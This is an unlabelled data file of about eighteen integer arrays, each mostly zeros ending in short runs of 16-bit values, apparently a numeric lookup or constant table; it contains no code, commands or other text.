[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 18564, 57153, 54502, 8710, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 45312, 9280, 2832, 18500, 17259],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 44932, 63041, 16870, 40710, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 41216, 36928, 12816, 42244, 16545, 25354],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 5764, 3393, 44774, 7174, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 33280, 12416, 26656, 11016, 20866, 49365],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 32132, 9281, 7142, 39174, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 14080, 58816, 31600, 12892, 3639, 39740],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 58500, 15169, 35046, 5638, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 34048, 51520, 80, 36207],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 19332, 21057, 62950, 37638, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 40192, 61248, 53712, 10996, 62621, 32350],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 45700, 26945, 25318, 4102, 0, 0, 0, 0, 0, 32768, 57344, 47104, 11776, 48000, 62176, 33720, 35886, 64441],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 6532, 32833, 53222, 36102, 0, 0, 0, 0, 49152, 12288, 52224, 21248, 3264, 3376, 1228, 24915, 28912],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 32900, 38721, 15590, 2566, 0, 0, 0, 0, 49152, 28672, 39936, 34560, 27072, 34928, 20636, 27187],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 59268, 44609, 43494, 34566, 0, 0, 16384, 36864, 58368, 55552, 40512, 17808, 1508, 46553, 54130],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 20100, 50497, 5862, 1030, 0, 32768, 40960, 26624, 6656, 54912, 57760, 5480, 44314, 58205],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 46468, 56385, 33766, 33030, 49152, 61440, 15360, 44800, 960, 54000, 50236, 42927, 8804],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 7300, 62273, 61670, 65030, 32768, 40960, 10240, 35328, 37504, 63648, 58664, 48567],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 33668, 2625, 40422, 51974, 54272, 21760, 40256, 19792, 42452, 41045, 5702],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 60036, 41281, 10982, 4102, 17920, 33152, 62560, 4120, 70, 15297],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 4484, 59457, 58342, 49158, 51904, 36016, 24748, 7499, 50072],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 63620, 8001, 39142, 36614, 48960, 51664, 43508, 11259],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 15376, 58244, 30529, 65062, 6166, 31428, 4113, 47834],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 49408, 43072, 48144, 14468, 14785, 27142, 36814, 4530, 35045],
